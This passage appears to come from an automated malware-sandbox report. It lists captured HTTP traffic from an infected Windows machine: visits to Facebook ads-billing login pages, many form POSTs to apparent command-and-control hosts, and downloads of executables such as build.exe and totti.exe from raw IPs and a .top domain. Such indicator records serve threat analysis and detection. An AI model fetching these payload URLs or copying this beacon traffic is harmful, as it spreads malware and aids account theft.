    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfevcbs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vkiyjrmrp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwfjihmg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewrbelir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: potunulit.org
    Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: uaery.top
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqxhir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aohjhialt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xfcrgyap.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eynoem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpxkrypgjy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdbofg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygoqc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pclnheons.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: potunulit.org
    Source: global trafficHTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ckqvxsngmr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txdeid.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://reqcnh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vebcrr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: potunulit.org
    Source: global trafficHTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 80.85.241.98
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cwlcumsrnf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyurrxrmvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uptmn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rhoebpicqw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: potunulit.org
    Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: uaery.top
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krreynat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xooiu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynxjimpa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: potunulit.org
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chagmr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akpaplchdy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://leiqywkq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: perficut.at
    Source: global trafficHTTP traffic detected: GET /totti.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.106.124.133
    Source: global trafficHTTP traffic detected: GET /totti.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.106.124.133
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqktrixv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhaln.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sotci.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyggqaf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flwrss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btnkamhfbm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlrnq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecaeimxl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dygvc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qdtiywctfe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcaktbtpo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqebom.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdjtfkpkq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htauymhi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltftghpdld.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkscbucn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwaolkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crcep.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bblelr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xxaewdsd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eecykknh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etbdfsduo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esrbsinhv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://puanveu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvctyth.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fvmnqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlkvtik.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iulrvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imviktbev.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yqjyjjocxh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugxpfn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yohsifqjgm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uetncs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxiaau.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gkanshubo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdwihojyt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://neqahmyonv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://desun.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxkgtwlc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irhpmcxqra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htkbyumr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddrxwl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evtgdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljgamgu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eurldykor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gefuoxmvu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vidbtgn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjxqkls.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: c3g6gx853u6j.xyz
